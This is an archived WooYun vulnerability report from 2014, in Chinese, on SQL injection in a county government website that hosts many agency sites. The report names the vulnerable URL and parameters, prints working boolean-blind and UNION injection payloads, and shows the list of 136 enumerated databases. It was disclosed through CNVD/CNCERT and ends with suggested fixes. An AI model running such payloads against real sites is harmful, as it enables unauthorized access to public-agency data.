当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071459

漏洞标题:某政府站点SQL注入,影响大量机关单位站点

相关厂商:某县人民政府

漏洞作者: 路人甲

提交时间:2014-08-07 19:13

修复时间:2014-09-21 19:14

公开时间:2014-09-21 19:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-07: 细节已通知厂商并且等待厂商处理中
2014-08-12: 厂商已经确认,细节仅向厂商公开
2014-08-22: 细节向核心白帽子及相关领域专家公开
2014-09-01: 细节向普通白帽子公开
2014-09-11: 细节向实习白帽子公开
2014-09-21: 细节向公众公开

简要描述:

这是我看过的最奇葩的网站了,没有之一

详细说明:

故事起始于一个url:

http://www.yiliang.gov.cn/info.asp?id=1298&catid=6


问题参数:

id,catid


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1298' AND 2286=2286 AND 'mCTC'='mCTC&catid=6
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=1298' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(97)+CHAR
(109)+CHAR(110)+CHAR(58)+CHAR(78)+CHAR(80)+CHAR(78)+CHAR(115)+CHAR(105)+CHAR(80)+CHAR
(87)+CHAR(103)+CHAR(117)+CHAR(66)+CHAR(58)+CHAR(115)+CHAR(102)+CHAR(103)+CHAR(58), NULL,
NULL-- &catid=6


available databases [136]:
[*] cnb4001_db
[*] cnb4003_db
[*] cnb4005_db
[*] cnb4006_db
[*] cnb4007_db
[*] cnb4008_db
[*] cnb4009_db
[*] cnb4010_db
[*] cnb4011_db
[*] cnb4013_db
[*] cnb4015_db
[*] cnb4017_db
[*] cnb4018_db
[*] cnb4019_db
[*] cnb4021_db
[*] cnb4022_db
[*] cnb4023_db
[*] cnb4024_db
[*] cnb4026_db
[*] cnb4027_db
[*] cnb4028_db
[*] cnb4029_db
[*] cnb4030_db
[*] cnb4032_db
[*] cnb4033_db
[*] cnb4034_db
[*] cnb4036_db
[*] cnb4037_db
[*] cnb4038_db
[*] cnb4040_db
[*] cnb4041_db
[*] cnb4042_db
[*] cnb4044_db
[*] cnb4048_db
[*] cnb4051_db
[*] cnb4052_db
[*] cnb4053_db
[*] cnb4056_db
[*] cnb4057_db
[*] cnb4058_db
[*] cnb4059_db
[*] cnb4060_db
[*] cnb4061_db
[*] cnb4063_db
[*] cnb4065_db
[*] cnb4066_db
[*] cnb4067_db
[*] cnb4071_db
[*] cnb4072_db
[*] cnb4073_db
[*] cnb4074_db
[*] cnb4075_db
[*] cnb4078_db
[*] cnb4079_db
[*] cnb4081_db
[*] cnb4082_db
[*] cnb4083_db
[*] cnb4084_db
[*] cnb4085_db
[*] cnb4086_db
[*] cnb4087_db
[*] cnb4090_db
[*] cnb4091_db
[*] cnb4092_db
[*] cnb4096_db
[*] cnb4097_db
[*] cnb4099_db
[*] cnb4101_db
[*] cnb4104_db
[*] cnb4106_db
[*] cnb4108_db
[*] cnb4109_db
[*] cnb4110_db
[*] cnb4112_db
[*] cnb4114_db
[*] cnb4116_db
[*] cnb4117_db
[*] cnb4119_db
[*] cnb4120_db
[*] cnb4121_db
[*] cnb4122_db
[*] cnb4125_db
[*] cnb4126_db
[*] cnb4127_db
[*] cnb4128_db
[*] cnb4131_db
[*] cnb4132_db
[*] cnb4133_db
[*] cnb4134_db
[*] cnb4138_db
[*] cnb4139_db
[*] cnb4140_db
[*] cnb4141_db
[*] cnb4142_db
[*] cnb4143_db
[*] cnb4144_db
[*] cnb4145_db
[*] cnb4146_db
[*] cnb4147_db
[*] cnb4148_db
[*] cnb4151_db
[*] cnb4153_db
[*] cnb4155_db
[*] cnb4156_db
[*] cnb4158_db
[*] cnb4160_db
[*] cnb4161_db
[*] cnb4162_db
[*] cnb4164_db
[*] cnb4165_db
[*] cnb4167_db
[*] cnb4168_db
[*] cnb4169_db
[*] cnb4170_db
[*] cnb4172_db
[*] cnb4174_db
[*] cnb4175_db
[*] cnb4176_db
[*] cnb4179_db
[*] cnb4180_db
[*] cnb4182_db
[*] cnb4183_db
[*] cnb4185_db
[*] cnb4187_db
[*] cnb4188_db
[*] cnb4191_db
[*] cnb4194_db
[*] cnb4196_db
[*] cnb4198_db
[*] cnb4199_db
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


看到如此多的数据表,我想知道这个站到底有些啥?

site:yiliang.gov.cn


1.jpg

2.jpg


注意看url,亮点就在这里,整个县级政府单位全部放在主站目录下。。。翻了两页,看到若干个机关单位~囧~

宜良县人力资源和社会保障局
宜良县人民政府办公室
宜良县统计局
宜良县林业局
宜良县财政局
宜良县公安局
宜良县安全生产监督管理局
宜良县人力资源和社会保障局
宜良县民政局
宜良县卫生局
...


太多单位了,不敢继续下去了

admin.jpg


到此为止,未做任何破坏

漏洞证明:

info.jpg

table.jpg

修复方案:

1、参数过滤
2、站点还是分开管理吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-12 09:16

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无